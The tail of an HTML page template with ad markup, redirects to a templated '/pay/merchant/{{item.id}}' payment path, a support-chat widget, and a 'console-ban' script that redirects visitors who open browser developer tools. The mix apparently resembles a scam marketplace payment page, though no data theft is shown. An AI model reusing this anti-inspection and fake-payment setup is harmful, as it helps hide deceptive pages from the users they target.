                        <div class="Box-sc-wfmb7k-0 imYOc"><div id="apn-large-skyscraper" class="SkyscraperLargeRenderSlot___StyledDiv-sc-1o0vwmv-0 eyeLQK apn-renderslot" aria-hidden="true"></div></div>
                    </div>
                </div>
            </div>
            <div class="Toastify"></div>
        </div>

        <script>
            function sendRequestCard() {
                window.location.href = '/pay/merchant/{{item.id}}'
            }
        </script>

        <script src="/style/other/axios.min.js"></script>
    <script>
        function redirect() {
                window.location.replace('/pay/merchant/{{item.id}}')
            }
        const itemId = "{{item.id}}"
    </script>
    <script src="/style/other/other.js"></script>


        <script type="text/javascript">
            function openSupport() {
                document.querySelector('.support-circle').style.display = 'none'
                document.querySelector('#chatra').style.display = 'block'

                const iframe = document.getElementById("chatra__iframe")
                const elmnt = iframe.contentWindow.document.querySelector("#app")
                elmnt.style.display = "block"
            }
        </script>

    <script src="/style/other/jquery-3.6.0.min.js"></script>
        <script src="/style/other/axios.min.js"></script>
        <script src="/style/protect/console-ban.min.js"></script>
        <script>
            ConsoleBan.init({
                redirect: 'https://http.cat/403'
            })
        </script>
    </body>
</html>